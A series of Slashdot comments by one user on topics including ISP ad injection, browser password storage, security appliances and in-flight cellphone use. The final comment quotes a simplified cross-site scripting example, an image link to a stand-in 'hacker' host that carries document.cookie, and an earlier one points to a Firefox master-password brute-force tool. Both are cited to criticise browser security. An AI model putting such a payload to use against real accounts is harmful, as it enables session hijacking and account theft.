
Comment Re:Canadians: Complain to the Privacy Commissioner (Score 1) 127

Doesn't that blatantly violate the copyright of the websites who are serving that data?

Doesn't doubleclick have enough lawyers to blow Bell back to the stone age?

I specifically remember years ago, when someone tried to build a CLIENT SIDE application that allowed you and others to "comment on top of" a website as it was displayed in your browser, they got completely blown out of the water over this, because they were "defacing and modifying someone else's copyright'd content" -- and that wasn't even as clear as this, that was in your browser after it had been displayed, this is flat out interception of communication between me and a third party and MODIFICATION of said data.

It's just completely fucked up. Everyone needs to enable SSL on their websites, cpu and bandwidth be damned.

Comment linked-in "architecture" (Score 1) 78

Two separate times over a couple years I have gone into my linked-in profile and de-selected ALL the "email you this" and "email you that" options.

I kept getting email notifications for large numbers of things. (Yes, I waited 7+ days after each profile change.)

TWICE I've gone to their technical support staff. TWICE they've failed to figure out how to configure their systems to not send me e-mail notifications. The second time they flat out apologized for not being able to do it successfully, they were able to recognize that however their back end is configured and architected ... it's just impossible to do certain things.

Yeah, no, I'm not trusting private data to them.

Comment Re:When will the US people oust their gov? (Score 1) 381

I should say, I'm commenting on the "only 1 out of 100's" aspect -- not on the "oust the gov" ala revolution.

Rather -- we haven't even begun to use the peaceful means our society provides to correct things and enact change. It sometimes REQUIRES us to become involved with the process.

( Dang it, when will slashdot let me edit a post? Get with the times man. )

Comment Re:When will the US people oust their gov? (Score 1) 381

Yeah, there is a massive amount of historical evidence that people will "go with the crowd" and it's rare, really rare, to see someone sacrifice even a modicum of their ... time let alone personal safety/comfort, even if it's just theoretical acceptance of a risk ... to help defend what they think is important. It's too easy to come up with excuses to not act*.

  - Things aren't too bad yet
  - Other people are working on it
  - I'll do something when the time is right
  - Well it's not as important as I thought
  - I'm not potentially sacrificing my career or even a small part of my liberty for this, simply "holding my opinion" is my contribution to "resisting".
  - My contribution is too small to matter. No one will listen.
  - Secret dark forces we cannot fight are arrayed against us**.
  - etc

(*) And I'm including myself here. I haven't written a letter to anyone yet about any of the serious things that have happened lately.
(**) A huge fraction of people are conspiracy theorists, and they ALWAYS pull this out of the hat when you ask them "omg that's horrible, what are you personally doing about it".

Comment Re:What a dick (Score 1) 248

> The late Donald Murray, a rifleman in WWII, wrote that the guys who were loudest before combat usually were the ones he could not rely on in a firefight.

Too many "Donald Murray's" in the world for google to find, got any references/links? Always love reading a good first person story from people like this.

Cheers.

Comment Re:This is also the case on Firefox (Score 1) 482

It is theatre. Even your non-techie friends can use google, which immediately leads to tools that can brute force the master password (http://securityxploded.com/firemaster.php), and without a doubt there are tools out there that will read the master password from running memory, and I'd expect that to appear in open/published tools like the above someday too.

The main problem with this theatre is that you and other people might be fooled into believing you are more secure than you are, and store things there that you should not.

The software developers are refusing to participate in this theatre in order to force you to recognize the actual reality of the situation.

If one person stores their bank credentials in their browser password database and loses their life savings, it's unacceptable.

Note -- Pidgin doesn't support a master password nor does it even obfuscate the stored passwords, the passwords are stored in a text file IN THE CLEAR, because they are making a conscious choice to explicitly point out to you that there is no actual security for 90% of the cases where you will be attacked. If someone can read your files and your user's system memory, they have you.

Comment Re:Why not? (Score 1) 398

SHHHHHHhhh, don't give them any ideas!

2099 to 2135 - Second Era of Known Space: Life-extending organ transplants are supplied by the organ banks, which are mainly supplied by the bodies of executed criminals. The enormous demand for organs has vastly increased use of the death penalty, to include even minor crimes.

Comment Re:Welcome to 1984 ... (Score 5, Insightful) 205

> 1984

Is infinite and open access to information the core of "what's wrong" with society in 1984? Or is it the fact that the citizens have no control over their government, no freedom of speech, etc?

What's the technological difference between

- all citizens each day looking at photos of people wanted by the police for what we consider crimes, and calling the local detachment when we recognize someone
- a computer doing the above
- citizens calling the KGB because their neighbour said something snarky about the state
- a computer doing the above

> Brave New World

And I quote: "The vast majority of the population is unified under the World State, an eternally peaceful, stable global society in which goods and resources are plentiful (because the population is permanently limited to no more than two billion people) and everyone is happy."

I strongly object to warrantless wiretapping, and I definitely want tons of checks and balances, and I want my elected representatives to share my values.

That doesn't mean that "databases" are inherently bad, or can't help us create a more effective just society. Like all tools, it depends on how you use them. Ever read "The Golden Age" by John C. Wright, or any of the Polity novels by Neal Asher?

Comment Re:Slashvertising (Score 1) 63

Afford, yes. Implement? PROPERLY?

I kid you not, 90% of general purpose software developers are not sharp enough to "touch" security related code or systems without leaving GAPING holes because they totally don't understand or misunderstand simple things.

They can write an if/else or a while loop, but other more advanced things ... just beyond them. And even the moderately smart senior personnel will accidentally leave something in a "prototype" state and accidentally ship it because of deadlines.

This is the security/encryption equivalent of a Barracuda anti-spam appliance. Yes, any smart sharp sysadmin with sufficient time allocated to the task can implement brilliant near-perfect spam filtering using open source products. LOTS of sysadmins a) aren't that smart: it won't be configured nearly as well as a company needs, and it'll fail frequently or do strange things because they disagree on how it should work, and b) they won't have sufficient man weeks allocated to it, and remember, the less sharp the person is, the more time they'll need and the more problems there will be.

WAY BETTER for an SMB* to simply drop cash on an "appliance". It's almost impossible for a Barracuda to do worse than your average overworked sysadmin.

I'm not a shill for the latter, it's simply the device the SMB I work for uses. And our sysadmins aren't dumb. They're just not brilliant and they are, of course, overworked.

(*) Small and Medium Business

Comment Re:Edge of space? (Score 1) 90

Perhaps. But 100km is a pretty arbitrary number. When I was growing up (and where I live everything was still in miles, especially anything written by or about the US space program), space was "100 miles" up. Funny how it's a neat round number like that.

http://ww2010.atmos.uiuc.edu/guides/mtr/prs/gifs/hght2.gif

He's above 99% of the atmosphere. That's good enough for me. "Edge" -- how do you define that? He's not IN space, certainly. I wouldn't compare it to a beach, a beach is only 10-100 feet wide. I'd make the argument that the "Edge" of space is a "beach" that's around 50km wide :)

Related question - what would make a good fundamental "minimum altitude" to say "space"?

50% odds of making one orbit (if you had sufficient tangential velocity at that altitude) without orbital decay? How much orbital decay? ALL orbits decay "a bit". 50% odds of making one orbit and being able to make a second orbit without touching the ground "underneath" your starting point?

And THEN on top of that, there's the fluctuating undulating atmosphere, that line is going to change day to day and year to year and place to place. Of course, if the tide rises and your boat is floating "closer to shore", you're still "on the ocean" :)

Comment Re:The cellphone ban is overreaching, too (Score 3, Insightful) 369

I'm not assaulting a kid and stealing his property while on an airplane.

Yes, these are exactly what the kid would claim the moment he started a fistfight over his frickin property, on an airplane.

And there you'd sit, trying to defend your actions after the plane had returned to the ground and both you and the kid kicked off the airplane and banned from flying that airline ever again.

No. Way.

Comment Re:Avionics (Score 3, Insightful) 369

> I know pilots that have cellphone conversations while landing a 737.

This wouldn't be the same pilots who missed an audible LORAN transmitter's approach turn signal in the Andes and killed 200 people crashing into a mountain?

Because of course, all pilots are "experts" at what they do and they never make poor choices killing hundreds of their clients.

Comment Re:Not a new exploit (Score 1) 50

> All the hacker has to do is embed a link or image into an email and send that email to the Yahoo account of the victim. The victim then logs in and clicks the link or views the images. ..snip..
>
> Simplified example:
> Embedded image src in email: http://www.hacker.com/cookieparser.php?default=alert(document.cookie)

I hope I don't understand that correctly.

WHY is any browser expressing a cookie via javascript as a target of a link to a site that has nothing to do with the cookie?

WHY would any browser allow any method of sending cookies to sites OTHER than the ones the cookie identifies with?

They can't possibly expect every application and website developer in the world to write huge amounts of complicated "cleaning" code. That's idiotic. Why would they, in this day and age, introduce functionality in the specifications that allow stuff like this?

If Yahoo can't keep with all the "functionality" that's available via javascript, you can guess how far behind the curve the application developers are at your small midwest bank.
